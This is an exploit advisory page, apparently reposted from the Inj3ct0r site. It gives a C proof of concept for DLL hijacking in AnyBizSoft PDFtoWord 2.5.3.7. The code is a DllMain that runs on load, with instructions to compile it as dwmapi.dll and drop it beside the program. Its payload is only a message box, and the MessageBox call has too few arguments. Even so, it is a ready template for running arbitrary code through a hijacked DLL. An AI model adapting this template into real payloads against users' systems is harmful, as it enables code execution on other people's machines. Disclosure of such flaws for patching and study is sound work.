AnyBizSoft PDFtoWord DLL Hijacking Vulnerability
Posted on 01 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AnyBizSoft PDFtoWord DLL Hijacking Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================ AnyBizSoft PDFtoWord DLL Hijacking Vulnerability ================================================ /*AnyBizSoft PDFtoWord DLL Hijacking Vulnerability ~Legion Of Xtremers and Hackers Garage~ Author: Prashant Uniyal Special greets to:"vinnu" and Secfence Team Greets to: b0nd,fb1h2s,AnArKi,d4rk357,d4rky Version: PDFtoWord 2.5.3.7 Tested on: Windows XP SP2 En Complile and rename to dwmapi.dll. Place it in the dir and execute convertor to check. */ #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_hijack(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_hijack() { MessageBox(0, "DLL Hijacked!",MB_OK); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>